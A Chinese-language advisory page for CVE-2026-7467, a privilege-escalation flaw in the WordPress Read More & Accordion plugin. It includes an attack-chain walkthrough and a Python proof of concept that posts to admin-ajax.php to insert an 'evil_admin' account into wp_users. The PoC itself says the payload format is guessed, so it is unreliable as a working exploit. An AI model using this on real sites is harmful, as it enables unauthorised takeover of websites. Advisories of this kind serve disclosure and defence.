IPBUF安全漏洞报告
English
CVE-2026-7467 CVSS 8.8 高危

CVE-2026-7467 WordPress Read More插件权限提升漏洞

披露日期: 2026-05-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7467
漏洞类型
权限提升
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Read More & Accordion (WordPress Plugin)

相关标签

CVE-2026-7467WordPress权限提升插件漏洞SQL注入

漏洞概述

WordPress的Read More & Accordion插件在所有版本(包括3.5.7及以下)中存在严重的权限提升漏洞。该漏洞源于`RadMoreAjax::importData`函数在导入数据时未限制可写入的数据库表,且未对导入数据进行严格验证。拥有插件特定权限的经过身份验证的攻击者可以利用此漏洞,向`wp_users`和`wp_usermeta`表中插入任意行,包括`wp_capabilities`字段。这使得攻击者能够成功创建一个新的管理员账户,从而获得目标网站的完整管理员访问权限。

技术细节

该漏洞的核心技术原理在于`RadMoreAjax::importData`函数中存在严重的逻辑缺陷。该函数设计用于处理数据导入,但开发人员未能对导入操作的目标数据库表进行严格的白名单限制。当攻击者发起请求时,可以通过参数控制数据写入的目标表名。由于缺乏验证,攻击者能够将目标指向WordPress系统的核心用户表`wp_users`及其关联的元数据表`wp_usermeta`。在利用过程中,攻击者首先需要具备通过插件角色设置授予的最低权限。随后,通过发送特制的POST请求,攻击者注入包含恶意构造的用户名、密码哈希及权限元数据的载荷。该载荷被直接传递给数据库写入操作,从而绕过了WordPress标准的用户注册和权限分配流程。特别是通过篡改`wp_usermeta`表中的`wp_capabilities`字段,攻击者可以将新用户的角色直接定义为“administrator”。这种利用方式不依赖于复杂的内存破坏,而是利用了业务逻辑中对数据操作对象的失控,导致低权限用户直接提升至最高权限。

攻击链分析

STEP 1
侦察
攻击者识别目标站点安装了Read More & Accordion插件,且版本在3.5.7及以下。
STEP 2
获取低权限账户
攻击者注册或通过社工获取一个经过身份验证的低权限账户,该账户需拥有插件角色设置授予的基础权限。
STEP 3
发送恶意请求
攻击者向`admin-ajax.php`发送特制的POST请求,调用`RadMoreAjax::importData`函数,并将目标表参数修改为`wp_users`,载荷包含恶意管理员信息。
STEP 4
写入数据库
由于缺乏验证,插件将恶意数据直接插入到WordPress核心用户表中。
STEP 5
权限提升
攻击者使用新创建的管理员账户登录后台,获得网站完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" username = "attacker" password = "password" # Login session to obtain authentication cookies session = requests.Session() login_payload = { 'log': username, 'pwd': password, 'redirect_to': '', 'wp-submit': 'Log In', 'testcookie': '1' } session.post("http://example.com/wp-login.php", data=login_payload) # Exploit payload targeting the vulnerable importData function # This payload attempts to insert a new administrator into wp_users exploit_data = { 'action': 'importData', 'table_name': 'wp_users', 'data_to_import': 'user_login,evil_admin,user_email,[email protected],user_pass,$P$B1234567890fakehash,user_registered,2026-01-01 00:00:00,user_status,0' # Note: The exact format of 'data_to_import' depends on plugin parsing logic (CSV, JSON, etc.) } response = session.post(target_url, data=exploit_data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check user list for 'evil_admin' with Administrator privileges.") else: print("[-] Failed to send payload.")

影响范围

Read More & Accordion <= 3.5.7

防御指南

临时缓解措施
如果无法立即升级插件,建议暂时禁用Read More & Accordion插件以阻断攻击链。同时,网站管理员应审查数据库中的`wp_users`和`wp_usermeta`表,手动删除通过漏洞非法创建的账户。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表